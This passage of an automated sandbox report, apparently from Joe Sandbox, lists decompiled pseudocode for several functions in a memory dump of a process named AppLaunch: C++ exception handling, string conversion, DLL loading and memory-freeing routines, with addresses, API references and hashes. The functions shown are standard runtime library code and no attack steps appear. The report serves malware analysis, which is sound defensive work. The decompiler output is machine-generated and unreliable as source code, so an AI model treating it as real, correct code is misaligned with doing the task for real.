							_t224 = E00427DC5(_t270, _t275, _t296, _t301, 0);
							if( *((intOrPtr*)(_t224 + 0x10)) == 0) {
								L61:
								return _t224;
							} else {
								_t270 =  *(E00427DC5(_t270, _t275, _t296, _t301, 0) + 0x10);
								_t259 = E00427DC5(_t270, _t275, _t296, _t301, 0);
								_v28 = 1;
								_v8 =  *((intOrPtr*)(_t259 + 0x14));
								if(_t270 == 0 ||  *_t270 == 0xe06d7363 && _t270[0x10] == 3 && (_t270[0x14] == 0x19930520 || _t270[0x14] == 0x19930521 || _t270[0x14] == 0x19930522) && _t270[0x1c] == _t315) {
									goto L67;
								} else {
									if( *((intOrPtr*)(E00427DC5(_t270, _t275, _t296, _t301, _t315) + 0x1c)) == _t315) {
										L23:
										_t296 = _v8;
										_t275 = _v12;
										L24:
										_v52 = _t301;
										_v48 = 0;
										__eflags =  *_t270 - 0xe06d7363;
										if( *_t270 != 0xe06d7363) {
											L57:
											__eflags = _t301[3];
											if(_t301[3] <= 0) {
												goto L60;
											} else {
												__eflags = _a24;
												if(_a24 != 0) {
													goto L67;
												} else {
													_push(_a32);
													_push(_a28);
													_push(_t275);
													_push(_t301);
													_push(_a16);
													_push(_t296);
													_push(_a8);
													_push(_t270);
													L68();
													_t332 = _t332 + 0x20;
													goto L60;
												}
											}
										} else {
											__eflags = _t270[0x10] - 3;
											if(_t270[0x10] != 3) {
												goto L57;
											} else {
												__eflags = _t270[0x14] - 0x19930520;
												if(_t270[0x14] == 0x19930520) {
													L29:
													_t315 = _a32;
													__eflags = _t301[3];
													if(_t301[3] > 0) {
														_push(_a28);
														E00427578(_t270, _t275, _t301, _t315,  &_v68,  &_v52, _t275, _a16, _t301);
														_t296 = _v64;
														_t332 = _t332 + 0x18;
														_t247 = _v68;
														_v44 = _t247;
														_v16 = _t296;
														__eflags = _t296 - _v56;
														if(_t296 < _v56) {
															_t290 = _t296 * 0x14;
															__eflags = _t290;
															_v32 = _t290;
															do {
																_t291 = 5;
																_t250 = memcpy( &_v104,  *((intOrPtr*)( *_t247 + 0x10)) + _t290, _t291 << 2);
																_t332 = _t332 + 0xc;
																__eflags = _v104 - _t250;
																if(_v104 <= _t250) {
																	__eflags = _t250 - _v100;
																	if(_t250 <= _v100) {
																		_t294 = 0;
																		_v20 = 0;
																		__eflags = _v92;
																		if(_v92 != 0) {
																			_t299 = _t270[0x1c];
																			_t251 =  *((intOrPtr*)(_t299 + 0xc));
																			_t252 = _t251 + 4;
																			__eflags = _t252;
																			_v36 = _t252;
																			_t253 = _v88;
																			_v40 =  *_t251;
																			_v24 = _t253;
																			do {
																				asm("movsd");
																				asm("movsd");
																				asm("movsd");
																				asm("movsd");
																				_t327 = _v40;
																				_t314 = _v36;
																				__eflags = _t327;
																				if(_t327 <= 0) {
																					goto L40;
																				} else {
																					while(1) {
																						_push(_t299);
																						_push( *_t314);
																						_t254 =  &_v84;
																						_push(_t254);
																						L87();
																						_t332 = _t332 + 0xc;
																						__eflags = _t254;
																						if(_t254 != 0) {
																							break;
																						}
																						_t299 = _t270[0x1c];
																						_t327 = _t327 - 1;
																						_t314 = _t314 + 4;
																						__eflags = _t327;
																						if(_t327 > 0) {
																							continue;
																						} else {
																							_t294 = _v20;
																							_t253 = _v24;
																							goto L40;
																						}
																						goto L43;
																					}
																					_push(_a24);
																					_push(_v28);
																					E0042808A(_t299, _t270, _a8, _v8, _a16, _a20,  &_v84,  *_t314,  &_v104, _a28, _a32);
																					_t332 = _t332 + 0x30;
																				}
																				L43:
																				_t296 = _v16;
																				goto L44;
																				L40:
																				_t294 = _t294 + 1;
																				_t253 = _t253 + 0x10;
																				_v20 = _t294;
																				_v24 = _t253;
																				__eflags = _t294 - _v92;
																			} while (_t294 != _v92);
																			goto L43;
																		}
																	}
																}
																L44:
																_t296 = _t296 + 1;
																_t247 = _v44;
																_t290 = _v32 + 0x14;
																_v16 = _t296;
																_v32 = _t290;
																__eflags = _t296 - _v56;
															} while (_t296 < _v56);
															_t301 = _a20;
															_t315 = _a32;
														}
													}
													__eflags = _a24;
													if(__eflags != 0) {
														_push(1);
														E00427BF0(_t270, _t301, _t315, __eflags);
														_t275 = _t270;
													}
													__eflags = ( *_t301 & 0x1fffffff) - 0x19930521;
													if(( *_t301 & 0x1fffffff) < 0x19930521) {
														L60:
														_t224 = E00427DC5(_t270, _t275, _t296, _t301, _t315);
														__eflags =  *(_t224 + 0x1c);
														if( *(_t224 + 0x1c) != 0) {
															goto L67;
														} else {
															goto L61;
														}
													} else {
														_t228 = _t301[8] >> 2;
														__eflags = _t301[7];
														if(_t301[7] != 0) {
															__eflags = _t228 & 0x00000001;
															if((_t228 & 0x00000001) == 0) {
																_push(_t301[7]);
																_t229 = E00428B1F(_t270, _t301, _t315, _t270);
																_pop(_t275);
																__eflags = _t229;
																if(_t229 == 0) {
																	goto L64;
																} else {
																	goto L60;
																}
															} else {
																goto L54;
															}
														} else {
															__eflags = _t228 & 0x00000001;
															if((_t228 & 0x00000001) == 0) {
																goto L60;
															} else {
																__eflags = _a28;
																if(_a28 != 0) {
																	goto L60;
																} else {
																	L54:
																	 *(E00427DC5(_t270, _t275, _t296, _t301, _t315) + 0x10) = _t270;
																	_t237 = E00427DC5(_t270, _t275, _t296, _t301, _t315);
																	_t286 = _v8;
																	 *((intOrPtr*)(_t237 + 0x14)) = _v8;
																	goto L62;
																}
															}
														}
													}
												} else {
													__eflags = _t270[0x14] - 0x19930521;
													if(_t270[0x14] == 0x19930521) {
														goto L29;
													} else {
														__eflags = _t270[0x14] - 0x19930522;
														if(_t270[0x14] != 0x19930522) {
															goto L57;
														} else {
															goto L29;
														}
													}
												}
											}
										}
									} else {
										_v16 =  *((intOrPtr*)(E00427DC5(_t270, _t275, _t296, _t301, _t315) + 0x1c));
										_t264 = E00427DC5(_t270, _t275, _t296, _t301, _t315);
										_push(_v16);
										 *(_t264 + 0x1c) = _t315;
										_t265 = E00428B1F(_t270, _t301, _t315, _t270);
										_pop(_t286);
										if(_t265 != 0) {
											goto L23;
										} else {
											_t301 = _v16;
											_t353 =  *_t301 - _t315;
											if( *_t301 <= _t315) {
												L62:
												E00431E6E(_t270, _t286, _t296, _t301, _t315, __eflags);
											} else {
												while(1) {
													_t286 =  *((intOrPtr*)(_t315 + _t301[1] + 4));
													if(L004287A8( *((intOrPtr*)(_t315 + _t301[1] + 4)), _t353, 0x4c6b64) != 0) {
														goto L63;
													}
													_t315 = _t315 + 0x10;
													_t269 = _v20 + 1;
													_v20 = _t269;
													_t353 = _t269 -  *_t301;
													if(_t269 >=  *_t301) {
														goto L62;
													} else {
														continue;
													}
													goto L63;
												}
											}
											L63:
											_push(1);
											_push(_t270);
											E00427BF0(_t270, _t301, _t315, __eflags);
											_t275 =  &_v64;
											E00428790( &_v64);
											E0042750C( &_v64, 0x44a274);
											L64:
											 *(E00427DC5(_t270, _t275, _t296, _t301, _t315) + 0x10) = _t270;
											_t231 = E00427DC5(_t270, _t275, _t296, _t301, _t315);
											_t275 = _v8;
											 *(_t231 + 0x14) = _v8;
											__eflags = _t315;
											if(_t315 == 0) {
												_t315 = _a8;
											}
											E0042776B(_t275, _t315, _t270);
											E00428A1F(_a8, _a16, _t301);
											_t234 = E00428BDC(_t301);
											_t332 = _t332 + 0x10;
											_push(_t234);
											E00428996(_t270, _t275, _t296, _t301, _t315, __eflags);
											goto L67;
										}
									}
								}
							}
						}
					}
				}
			}

0x0042810a
0x00428111
0x00428113
0x0042811c
0x00428122
0x0042812a
0x0042812c
0x0042812f
0x00428135
0x004284a9
0x004284a9
0x004284ae
0x004284b0
0x004284b2
0x004284b5
0x004284b6
0x004284b9
0x004284bf
0x004285de
0x004284c5
0x004284c5
0x004284c6
0x004284c7
0x004284ce
0x004284d1
0x004284d4
0x004284da
0x004284dc
0x004284e1
0x004284e4
0x004284e6
0x004284ec
0x004284ee
0x004284f4
0x00428509
0x0042850e
0x00428511
0x00428513
0x004285da
0x00000000
0x004285db
0x00428513
0x004284f4
0x004284ec
0x004284e4
0x00428519
0x0042851c
0x0042851f
0x00428522
0x00428525
0x0042852b
0x0042853d
0x00428542
0x00428545
0x00428548
0x0042854b
0x0042854e
0x00428551
0x00428554
0x00000000
0x00000000
0x0042855a
0x0042855a
0x0042855d
0x00428560
0x0042856f
0x00428570
0x00428570
0x00428572
0x00428575
0x00000000
0x00000000
0x00428577
0x0042857a
0x00000000
0x00000000
0x00428588
0x0042858a
0x0042858d
0x0042858f
0x00428597
0x00428597
0x0042859a
0x0042859c
0x0042859e
0x004285ba
0x004285bf
0x004285c2
0x004285c2
0x00000000
0x0042859a
0x00428591
0x00428595
0x00000000
0x00000000
0x00000000
0x004285c5
0x004285c8
0x004285c9
0x004285cc
0x004285cf
0x004285d2
0x004285d5
0x004285d5
0x00000000
0x00428560
0x004285df
0x004285e4
0x004285e5
0x004285e8
0x004285eb
0x004285ec
0x004285ed
0x004285ee
0x004285f1
0x004285f3
0x0042866b
0x0042866d
0x0042866d
0x004285f5
0x004285f5
0x004285f8
0x004285fb
0x00000000
0x004285fd
0x004285fd
0x00428600
0x00428603
0x0042860a
0x0042860a
0x0042860d
0x0042860f
0x00428611
0x00428643
0x00428643
0x00428646
0x0042864d
0x0042864d
0x00428650
0x00428653
0x0042865a
0x0042865a
0x0042865d
0x00428664
0x00428666
0x00428666
0x0042865f
0x0042865f
0x00428662
0x00000000
0x00000000
0x00428662
0x00428655
0x00428655
0x00428658
0x00000000
0x00000000
0x00428658
0x00428648
0x00428648
0x0042864b
0x00000000
0x00000000
0x0042864b
0x00428667
0x00428613
0x00428613
0x00428613
0x00428616
0x00428616
0x00428618
0x0042861a
0x00000000
0x00000000
0x0042861c
0x0042861e
0x00428632
0x00428632
0x00428620
0x00428620
0x00428623
0x00428626
0x00000000
0x00428628
0x00428628
0x0042862b
0x0042862e
0x00428630
0x00000000
0x00000000
0x00000000
0x00000000
0x00428630
0x00428626
0x0042863b
0x0042863b
0x0042863d
0x00000000
0x0042863f
0x0042863f
0x0042863f
0x00000000
0x0042863d
0x00428636
0x00428638
0x00428638
0x00000000
0x00428638
0x00428605
0x00428605
0x00428608
0x00000000
0x00000000
0x00000000
0x00000000
0x00428608
0x00428603
0x004285fb
0x0042866e
0x00428672
0x00428672
0x00428144
0x00428144
0x0042814d
0x0042824a
0x0042824a
0x0042824d
0x00000000
0x0042817c
0x0042817c
0x00428181
0x00000000
0x00428187
0x00428187
0x0042818f
0x00428443
0x00428447
0x00428195
0x0042819a
0x0042819d
0x004281a2
0x004281a9
0x004281ae
0x00000000
0x004281e6
0x004281ee
0x00428252
0x00428252
0x00428255
0x00428258
0x0042825a
0x0042825d
0x00428260
0x00428266
0x00428412
0x00428412
0x00428415
0x00000000
0x00428417
0x00428417
0x0042841a
0x00000000
0x00428420
0x00428420
0x00428423
0x00428426
0x00428427
0x00428428
0x0042842b
0x0042842c
0x0042842f
0x00428430
0x00428435
0x00000000
0x00428435
0x0042841a
0x0042826c
0x0042826c
0x00428270
0x00000000
0x00428276
0x00428276
0x0042827d
0x00428295
0x00428295
0x00428298
0x0042829b
0x004282a1
0x004282b1
0x004282b6
0x004282b9
0x004282bc
0x004282bf
0x004282c2
0x004282c5
0x004282c8
0x004282ce
0x004282ce
0x004282d1
0x004282d4
0x004282e3
0x004282e4
0x004282e4
0x004282e6
0x004282e9
0x004282ef
0x004282f2
0x004282f8
0x004282fa
0x004282fd
0x00428300
0x00428306
0x00428309
0x0042830e
0x0042830e
0x00428311
0x00428314
0x00428317
0x0042831a
0x0042831d
0x00428322
0x00428323
0x00428324
0x00428325
0x00428326
0x00428329
0x0042832c
0x0042832e
0x00000000
0x00428330
0x00428330
0x00428330
0x00428331
0x00428333
0x00428336
0x00428337
0x0042833c
0x0042833f
0x00428341
0x00000000
0x00000000
0x00428343
0x00428346
0x00428347
0x0042834a
0x0042834c
0x00000000
0x0042834e
0x0042834e
0x00428351
0x00000000
0x00428351
0x00000000
0x0042834c
0x00428365
0x0042836b
0x00428388
0x0042838d
0x0042838d
0x00428390
0x00428390
0x00000000
0x00428354
0x00428354
0x00428355
0x00428358
0x0042835b
0x0042835e
0x0042835e
0x00000000
0x00428363
0x00428300
0x004282f2
0x00428393
0x00428396
0x00428397
0x0042839a
0x0042839d
0x004283a0
0x004283a3
0x004283a3
0x004283ac
0x004283af
0x004283af
0x004282c8
0x004283b2
0x004283b6
0x004283b8
0x004283bb
0x004283c1
0x004283c1
0x004283c9
0x004283ce
0x00428438
0x00428438
0x0042843d
0x00428441
0x00000000
0x00000000
0x00000000
0x00000000
0x004283d0
0x004283d3
0x004283d6
0x004283da
0x004283e8
0x004283ea
0x00428401
0x00428405
0x0042840b
0x0042840c
0x0042840e
0x00000000
0x00428410
0x00000000
0x00428410
0x00000000
0x00000000
0x00000000
0x004283dc
0x004283dc
0x004283de
0x00000000
0x004283e0
0x004283e0
0x004283e4
0x00000000
0x004283e6
0x004283ec
0x004283f1
0x004283f4
0x004283f9
0x004283fc
0x00000000
0x004283fc
0x004283e4
0x004283de
0x004283da
0x0042827f
0x0042827f
0x00428286
0x00000000
0x00428288
0x00428288
0x0042828f
0x00000000
0x00000000
0x00000000
0x00000000
0x0042828f
0x00428286
0x0042827d
0x00428270
0x004281f0
0x004281f8
0x004281fb
0x00428200
0x00428204
0x00428207
0x0042820d
0x00428210
0x00000000
0x00428212
0x00428212
0x00428215
0x00428217
0x00428448
0x00428448
0x00000000
0x0042821d
0x00428225
0x00428230
0x00000000
0x00000000
0x00428239
0x0042823c
0x0042823d
0x00428240
0x00428242
0x00000000
0x00428248
0x00000000
0x00428248
0x00000000
0x00428242
0x0042821d
0x0042844d
0x0042844d
0x0042844f
0x00428450
0x00428457
0x0042845a
0x00428468
0x0042846d
0x00428472
0x00428475
0x0042847a
0x0042847d
0x00428480
0x00428482
0x00428484
0x00428484
0x00428489
0x00428495
0x0042849b
0x004284a0
0x004284a3
0x004284a4
0x00000000
0x004284a4
0x00428210
0x004281ee
0x004281ae
0x0042818f
0x00428181
0x0042814d

APIs

___TypeMatch.LIBVCRUNTIME ref: 00428337
_UnwindNestedFrames.LIBCMT ref: 00428489
CallUnexpected.LIBVCRUNTIME ref: 004284A4

Strings

csm, xrefs: 00428147
csm, xrefs: 00428260
csm, xrefs: 004281B4

Memory Dump Source

Source File: 0000000E.00000002.543498747.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.543471550.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543529684.0000000000440000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543540251.000000000044B000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543603713.00000000004C8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AppLaunch.jbxd

Similarity

API ID: CallFramesMatchNestedTypeUnexpectedUnwind
String ID: csm$csm$csm
API String ID: 3456342781-393685449
Opcode ID: 73200c90b3f6b9ee6338ad5bacba2c6460b18b3300edb286533cbe1e913d8634
Instruction ID: 7f264a38cb60d6f83c310dd02c39b5af1b759c55e31e59e9ecf705a87687d478
Opcode Fuzzy Hash: 73200c90b3f6b9ee6338ad5bacba2c6460b18b3300edb286533cbe1e913d8634
Instruction Fuzzy Hash: 26B1AD71A01229DFCF14EFA5E8409AFBBB4BF04314B94415FE8116B202DB39DA51CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 0043BF04 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 199
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E0043BF04(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				intOrPtr _v12;
				void* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t41;
				signed int _t49;
				void* _t51;
				signed int _t55;
				intOrPtr _t63;
				intOrPtr _t69;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr _t86;
				void* _t89;
				intOrPtr* _t91;
				intOrPtr _t93;
				void* _t94;
				void* _t95;
				signed int _t96;
				void* _t97;
				intOrPtr* _t98;
				intOrPtr* _t100;
				void* _t103;

				_push(__ecx);
				_push(__ecx);
				_t41 =  *0x4c61a4; // 0x8656a166
				_v8 = _t41 ^ _t96;
				_t93 = _a20;
				if(_t93 > 0) {
					_t69 = E0043D489(_a16, _t93);
					_t103 = _t69 - _t93;
					_t4 = _t69 + 1; // 0x1
					_t93 = _t4;
					if(_t103 >= 0) {
						_t93 = _t69;
					}
				}
				_t88 = _a32;
				if(_a32 == 0) {
					_t88 =  *((intOrPtr*)( *_a4 + 8));
					_a32 =  *((intOrPtr*)( *_a4 + 8));
				}
				_t86 = E00432C10(_t88, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t93, 0, 0);
				_t98 = _t97 + 0x18;
				_v12 = _t86;
				if(_t86 == 0) {
					L39:
					_pop(_t89);
					_pop(_t94);
					_pop(_t71);
					return E00424900(_t46, _t71, _v8 ^ _t96, _t86, _t89, _t94);
				} else {
					_t17 = _t86 + _t86 + 8; // 0x8
					asm("sbb eax, eax");
					_t49 = _t86 + _t86 & _t17;
					if(_t49 == 0) {
						_t72 = 0;
						L15:
						if(_t72 == 0) {
							L37:
							_t95 = 0;
							L38:
							E00437989(_t72);
							_t46 = _t95;
							goto L39;
						}
						_t51 = E00432C10(_t88, 1, _a16, _t93, _t72, _t86);
						_t100 = _t98 + 0x18;
						if(_t51 == 0) {
							goto L37;
						}
						_t90 = _v12;
						_t95 = E00433081(_a8, _a12, _t72, _v12, 0, 0, 0, 0, 0);
						if(_t95 == 0) {
							goto L37;
						}
						_t86 = 0x400;
						if((_a12 & 0x00000400) == 0) {
							_t31 = _t95 + _t95 + 8; // 0x8
							asm("sbb eax, eax");
							_t55 = _t95 + _t95 & _t31;
							if(_t55 == 0) {
								_t91 = 0;
								L31:
								if(_t91 == 0 || E00433081(_a8, _a12, _t72, _v12, _t91, _t95, 0, 0, 0) == 0) {
									L36:
									E00437989(_t91);
									goto L37;
								} else {
									_push(0);
									_push(0);
									if(_a28 != 0) {
										_push(_a28);
										_push(_a24);
									} else {
										_push(0);
										_push(0);
									}
									_push(_t95);
									_push(_t91);
									_push(0);
									_push(_a32);
									_t95 = E00437047();
									if(_t95 != 0) {
										E00437989(_t91);
										goto L38;
									} else {
										goto L36;
									}
								}
							}
							if(_t55 > 0x400) {
								_t91 = E00432552(_t55);
								if(_t91 == 0) {
									goto L36;
								}
								 *_t91 = 0xdddd;
								L29:
								_t91 = _t91 + 8;
								goto L31;
							}
							E0043F030(_t55);
							_t91 = _t100;
							if(_t91 == 0) {
								goto L36;
							}
							 *_t91 = 0xcccc;
							goto L29;
						}
						_t63 = _a28;
						if(_t63 == 0) {
							goto L38;
						}
						if(_t95 > _t63) {
							goto L37;
						}
						_t95 = E00433081(_a8, _a12, _t72, _t90, _a24, _t63, 0, 0, 0);
						if(_t95 != 0) {
							goto L38;
						}
						goto L37;
					}
					if(_t49 > 0x400) {
						_t72 = E00432552(_t49);
						if(_t72 == 0) {
							L13:
							_t86 = _v12;
							goto L15;
						}
						 *_t72 = 0xdddd;
						L12:
						_t72 = _t72 + 8;
						goto L13;
					}
					E0043F030(_t49);
					_t72 = _t98;
					if(_t72 == 0) {
						goto L13;
					}
					 *_t72 = 0xcccc;
					goto L12;
				}
			}

0x0043bf09
0x0043bf0a
0x0043bf0b
0x0043bf12
0x0043bf17
0x0043bf1d
0x0043bf23
0x0043bf29
0x0043bf2c
0x0043bf2c
0x0043bf2f
0x0043bf31
0x0043bf31
0x0043bf2f
0x0043bf33
0x0043bf38
0x0043bf3f
0x0043bf42
0x0043bf42
0x0043bf63
0x0043bf65
0x0043bf68
0x0043bf6d
0x0043c0cb
0x0043c0ce
0x0043c0cf
0x0043c0d0
0x0043c0dc
0x0043bf73
0x0043bf76
0x0043bf7b
0x0043bf7d
0x0043bf7f
0x0043bfb6
0x0043bfb8
0x0043bfba
0x0043c0c0
0x0043c0c0
0x0043c0c2
0x0043c0c3
0x0043c0c9
0x00000000
0x0043c0c9
0x0043bfc9
0x0043bfce
0x0043bfd3
0x00000000
0x00000000
0x0043bfd9
0x0043bff0
0x0043bff4
0x00000000
0x00000000
0x0043bffa
0x0043c002
0x0043c03f
0x0043c044
0x0043c046
0x0043c048
0x0043c079
0x0043c07b
0x0043c07d
0x0043c0b9
0x0043c0ba
0x00000000
0x0043c09a
0x0043c09c
0x0043c09d
0x0043c0a1
0x0043c0dd
0x0043c0e0
0x0043c0a3
0x0043c0a3
0x0043c0a4
0x0043c0a4
0x0043c0a5
0x0043c0a6
0x0043c0a7
0x0043c0a8
0x0043c0b0
0x0043c0b7
0x0043c0e6
0x00000000
0x00000000
0x00000000
0x00000000
0x0043c0b7
0x0043c07d
0x0043c04c
0x0043c067
0x0043c06c
0x00000000
0x00000000
0x0043c06e
0x0043c074
0x0043c074
0x00000000
0x0043c074
0x0043c04e
0x0043c053
0x0043c057
0x00000000
0x00000000
0x0043c059
0x00000000
0x0043c059
0x0043c004
0x0043c009
0x00000000
0x00000000
0x0043c011
0x00000000
0x00000000
0x0043c02d
0x0043c031
0x00000000
0x00000000
0x00000000
0x0043c037
0x0043bf86
0x0043bfa1
0x0043bfa6
0x0043bfb1
0x0043bfb1
0x00000000
0x0043bfb1
0x0043bfa8
0x0043bfae
0x0043bfae
0x00000000
0x0043bfae
0x0043bf88
0x0043bf8d
0x0043bf91
0x00000000
0x00000000
0x0043bf93
0x00000000
0x0043bf93

APIs

__alloca_probe_16.LIBCMT ref: 0043BF88
__alloca_probe_16.LIBCMT ref: 0043C04E
__freea.LIBCMT ref: 0043C0BA

Part of subcall function 00432552: RtlAllocateHeap.NTDLL(00000000,00000000,?,?,004248DC,00000000,?,004184DC,00000000,?,00407209,00000000), ref: 00432584

__freea.LIBCMT ref: 0043C0C3
__freea.LIBCMT ref: 0043C0E6

Strings

bnC, xrefs: 0043BF16

Memory Dump Source

Source File: 0000000E.00000002.543498747.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.543471550.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543529684.0000000000440000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543540251.000000000044B000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543603713.00000000004C8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AppLaunch.jbxd

Similarity

API ID: __freea$__alloca_probe_16$AllocateHeap
String ID: bnC
API String ID: 1423051803-2696515679
Opcode ID: 3810955b5742553f99f8943f2e805d92ef24076d6560c3f2cedd7249cd5d4579
Instruction ID: dcd877f43a08a946b50db6610e0fc0c34e045a6c640bae974e698b731eae5581
Opcode Fuzzy Hash: 3810955b5742553f99f8943f2e805d92ef24076d6560c3f2cedd7249cd5d4579
Instruction Fuzzy Hash: 0251D372600246AFEB289E95CC81FAB36B9DF48754F15612BFD04EB240D739DC418BA9

Uniqueness

Uniqueness Score: -1.00%

Function 00432D0E Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00432D0E(void* __ecx, signed int* _a4, intOrPtr _a8) {
				signed int* _v8;
				void** _t12;
				void* _t16;
				void* _t18;
				signed int _t22;
				WCHAR* _t23;
				void** _t26;
				signed int* _t29;
				void* _t32;
				void* _t34;

				_t29 = _a4;
				while(_t29 != _a8) {
					_t22 =  *_t29;
					_t12 = 0x4c7468 + _t22 * 4;
					_t32 =  *_t12;
					_v8 = _t12;
					if(_t32 == 0) {
						_t23 =  *(0x445b60 + _t22 * 4);
						_t32 = LoadLibraryExW(_t23, 0, 0x800);
						if(_t32 != 0) {
							L12:
							_t26 = _v8;
							 *_t26 = _t32;
							if( *_t26 != 0) {
								FreeLibrary(_t32);
							}
							L14:
							if(_t32 != 0) {
								_t16 = _t32;
								L18:
								return _t16;
							}
							L15:
							_t29 =  &(_t29[1]);
							continue;
						}
						_t18 = GetLastError();
						if(_t18 != 0x57) {
							L9:
							_t32 = 0;
							L10:
							if(_t32 != 0) {
								goto L12;
							}
							 *_v8 = _t18 | 0xffffffff;
							goto L15;
						}
						_t18 = E00431F88(_t23, L"api-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = E00431F88(_t23, L"ext-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = LoadLibraryExW(_t23, _t32, _t32);
						_t32 = _t18;
						goto L10;
					}
					if(_t32 == 0xffffffff) {
						goto L15;
					}
					goto L14;
				}
				_t16 = 0;
				goto L18;
			}

0x00432d17
0x00432dc1
0x00432d1f
0x00432d21
0x00432d28
0x00432d2a
0x00432d30
0x00432d3d
0x00432d52
0x00432d56
0x00432da8
0x00432da8
0x00432dad
0x00432db1
0x00432db4
0x00432db4
0x00432dba
0x00432dbc
0x00432dd1
0x00432dcc
0x00432dd0
0x00432dd0
0x00432dbe
0x00432dbe
0x00000000
0x00432dbe
0x00432d58
0x00432d61
0x00432d98
0x00432d98
0x00432d9a
0x00432d9c
0x00000000
0x00000000
0x00432da4
0x00000000
0x00432da4
0x00432d6b
0x00432d70
0x00432d75
0x00000000
0x00000000
0x00432d7f
0x00432d84
0x00432d89
0x00000000
0x00000000
0x00432d8e
0x00432d94
0x00000000
0x00432d94
0x00432d35
0x00000000
0x00000000
0x00000000
0x00432d3b
0x00432dca
0x00000000

Strings

api-ms-, xrefs: 00432D65
ext-ms-, xrefs: 00432D79

Memory Dump Source

Source File: 0000000E.00000002.543498747.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.543471550.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543529684.0000000000440000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543540251.000000000044B000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543603713.00000000004C8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AppLaunch.jbxd

Similarity

API ID:
String ID: api-ms-$ext-ms-
API String ID: 0-537541572
Opcode ID: df8d5bfaad471b1060d1d415fe7606ee3d9cd74c75c919ea6d998a103a055599
Instruction ID: 53bcf7d2a7436934db56459c11b5179a147349c00ee756d21107e1708c38f75a
Opcode Fuzzy Hash: df8d5bfaad471b1060d1d415fe7606ee3d9cd74c75c919ea6d998a103a055599
Instruction Fuzzy Hash: 46210A31A01320ABDB214B25AE41B5B37689F59B60F252122FE05F73D1D7B8ED0185ED

Uniqueness

Uniqueness Score: -1.00%

Function 004377A2 Relevance: 10.6, APIs: 7, Instructions: 65
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E004377A2(intOrPtr _a4) {
				void* _t18;

				_t45 = _a4;
				if(_a4 != 0) {
					E0043776A(_t45, 7);
					E0043776A(_t45 + 0x1c, 7);
					E0043776A(_t45 + 0x38, 0xc);
					E0043776A(_t45 + 0x68, 0xc);
					E0043776A(_t45 + 0x98, 2);
					E00432BD6( *((intOrPtr*)(_t45 + 0xa0)));
					E00432BD6( *((intOrPtr*)(_t45 + 0xa4)));
					E00432BD6( *((intOrPtr*)(_t45 + 0xa8)));
					E0043776A(_t45 + 0xb4, 7);
					E0043776A(_t45 + 0xd0, 7);
					E0043776A(_t45 + 0xec, 0xc);
					E0043776A(_t45 + 0x11c, 0xc);
					E0043776A(_t45 + 0x14c, 2);
					E00432BD6( *((intOrPtr*)(_t45 + 0x154)));
					E00432BD6( *((intOrPtr*)(_t45 + 0x158)));
					E00432BD6( *((intOrPtr*)(_t45 + 0x15c)));
					return E00432BD6( *((intOrPtr*)(_t45 + 0x160)));
				}
				return _t18;
			}

0x004377a8
0x004377ad
0x004377b6
0x004377c1
0x004377cc
0x004377d7
0x004377e5
0x004377f0
0x004377fb
0x00437806
0x00437814
0x00437822
0x00437833
0x00437841
0x0043784f
0x0043785a
0x00437865
0x00437870
0x00000000
0x00437880
0x00437885

APIs

Part of subcall function 0043776A: _free.LIBCMT ref: 0043778F

_free.LIBCMT ref: 004377F0

Part of subcall function 00432BD6: RtlFreeHeap.NTDLL(00000000,00000000,?,00431C11), ref: 00432BEC
Part of subcall function 00432BD6: GetLastError.KERNEL32(?,?,00431C11), ref: 00432BFE

_free.LIBCMT ref: 004377FB
_free.LIBCMT ref: 00437806
_free.LIBCMT ref: 0043785A
_free.LIBCMT ref: 00437865
_free.LIBCMT ref: 00437870
_free.LIBCMT ref: 0043787B

Memory Dump Source

Source File: 0000000E.00000002.543498747.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.543471550.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543529684.0000000000440000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543540251.000000000044B000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543603713.00000000004C8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AppLaunch.jbxd

Similarity

